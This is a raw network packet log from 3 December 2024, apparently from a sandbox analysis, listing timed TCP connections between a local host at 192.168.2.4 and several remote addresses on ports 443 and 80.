                                                                                                                      Dec 3, 2024 08:55:35.365797997 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.365829945 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.365884066 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.366082907 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.366092920 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.368386030 CET49959443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.368398905 CET4434995913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.369981050 CET49959443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.369986057 CET4434995913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.379183054 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.379442930 CET49960443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.379463911 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.379920959 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.380255938 CET49960443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.380354881 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.380445004 CET49960443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.418201923 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.421545029 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.421612024 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.422672987 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.422753096 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.423238993 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.423326969 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.423342943 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.423621893 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.423635006 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.465261936 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.566548109 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.566574097 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.566660881 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.566885948 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.566899061 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.684973955 CET4434995913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.688544035 CET4434995913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.688595057 CET4434995913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.688599110 CET49959443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.688647032 CET49959443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.688700914 CET49959443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.688718081 CET4434995913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.688734055 CET49959443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.688740015 CET4434995913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.691647053 CET49983443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.691684008 CET4434998313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.691759109 CET49983443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.691910028 CET49983443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.691927910 CET4434998313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.733249903 CET8049768208.95.112.1192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.733362913 CET4976880192.168.2.4208.95.112.1
                                                                                                                      Dec 3, 2024 08:55:35.850516081 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.851178885 CET49962443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.851231098 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.851664066 CET49962443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.851680040 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.223361969 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.223462105 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.223535061 CET49960443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.223560095 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.225035906 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.225083113 CET49960443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.226629019 CET49960443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.226643085 CET44349960196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.226653099 CET49960443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.226696014 CET49960443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.232366085 CET4976880192.168.2.4208.95.112.1
                                                                                                                      Dec 3, 2024 08:55:36.234568119 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.234610081 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.234680891 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.236423969 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.236434937 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.262864113 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.262891054 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.262944937 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.262976885 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.263238907 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.263297081 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.264038086 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.264085054 CET44349961196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.264127016 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.264184952 CET49961443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.264477968 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.264516115 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.264564037 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.265067101 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.265079021 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.285913944 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.285994053 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.286048889 CET49962443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.286325932 CET49962443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.286344051 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.286355019 CET49962443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.286360979 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.289880991 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.289902925 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.289961100 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.290173054 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.290185928 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.316274881 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.316559076 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.316585064 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.319380045 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.319442987 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.319722891 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.319848061 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.319901943 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.352977037 CET8049768208.95.112.1192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.370774031 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.370800018 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.417382002 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.448275089 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.449647903 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.449678898 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.449992895 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.450380087 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.450438976 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.450526953 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.491333008 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.509527922 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.511758089 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.511782885 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.512175083 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.513314009 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.513379097 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.513468027 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.553714991 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.554028034 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.554066896 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.554358959 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.554819107 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.554877996 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.555035114 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.559325933 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.599328995 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.665091991 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.665627956 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.665658951 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.671788931 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.671993971 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.672019958 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.673055887 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.673109055 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.673423052 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.673475027 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.673582077 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.673588037 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.680387020 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.680461884 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.680744886 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.680860996 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.680869102 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.689213991 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.713120937 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.716587067 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.716826916 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.716840982 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.717839956 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.717993021 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.719041109 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.719091892 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.720141888 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.720149040 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.730339050 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.730369091 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.744631052 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.748136044 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.748150110 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.748811960 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.748816967 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.760390997 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.775548935 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.780896902 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.781214952 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.781236887 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.782258034 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.782318115 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.782721043 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.782773972 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.783004999 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.783011913 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.804582119 CET4434997813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.805239916 CET49978443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.805259943 CET4434997813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.805860996 CET49978443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.805871964 CET4434997813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.824326992 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:36.965528011 CET4434997913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.966147900 CET49979443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.966161013 CET4434997913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:36.966645956 CET49979443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:36.966650963 CET4434997913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.086052895 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.086520910 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.086527109 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.087593079 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.088645935 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.089523077 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.089523077 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.089534044 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.089591980 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.134237051 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.134242058 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.162077904 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.162102938 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.162111998 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.162139893 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.162152052 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.162166119 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.162194967 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.162216902 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.163065910 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.163065910 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.163098097 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.163254023 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.163274050 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.164190054 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.179650068 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.182712078 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.182733059 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.182763100 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.182781935 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.182821989 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.186310053 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.186310053 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.186321974 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.186331034 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.195481062 CET49988443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.195499897 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.195566893 CET49988443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.195801973 CET49988443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.195811987 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.239883900 CET4434997813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.242921114 CET4434997813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.243017912 CET49978443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.243017912 CET49978443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.244646072 CET49978443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.244661093 CET4434997813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.247292995 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.247322083 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.247541904 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.247541904 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.247564077 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.294615984 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.294636965 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.295934916 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.295954943 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.340477943 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.351488113 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.351517916 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.352005959 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.352030039 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.382904053 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.383162022 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.383172989 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.383462906 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.384000063 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.384000063 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.384044886 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.400651932 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.417927027 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.417951107 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.419107914 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.419137001 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.419671059 CET4434997913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.422765017 CET4434997913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.422890902 CET49979443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.422890902 CET49979443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.424644947 CET49979443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.424654961 CET4434997913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.425932884 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.425947905 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.426179886 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.426179886 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.426198959 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.426330090 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.426388025 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.426409960 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.427072048 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.427072048 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.430362940 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.430362940 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.430397987 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.430421114 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.430452108 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.430533886 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.430541992 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.432209015 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.432224989 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.432235956 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.432248116 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.471076012 CET4434998313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.472660065 CET49983443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.472660065 CET49983443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.472680092 CET4434998313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.472696066 CET4434998313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.494257927 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.494282007 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.494487047 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.494519949 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.494720936 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.494899988 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.494942904 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.500688076 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.509948969 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.509979963 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.509988070 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.510086060 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.510102987 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.517488003 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.517512083 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.518296957 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.518369913 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.520888090 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.521702051 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.521707058 CET49993443192.168.2.4196.22.142.143
